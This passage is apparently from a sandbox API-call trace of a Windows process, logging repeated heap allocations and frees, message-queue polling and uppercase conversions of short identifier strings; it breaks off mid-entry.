PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.101] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0261.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.102] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.102] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0261.102] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0261.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0261.103] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0261.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0261.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.103] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.104] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.104] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0261.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0261.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0261.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.105] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.105] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.105] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0261.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0261.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0261.106] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0261.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.106] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0261.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.107] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.107] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0261.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0261.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.108] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.108] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.108] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.108] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0261.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0261.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0261.109] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0261.109] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0261.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.109] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0261.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.110] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0261.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.110] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.111] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0261.111] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0261.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0261.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0261.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e02d8 | out: hHeap=0x25c0000) returned 1 [0261.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0261.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0261.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 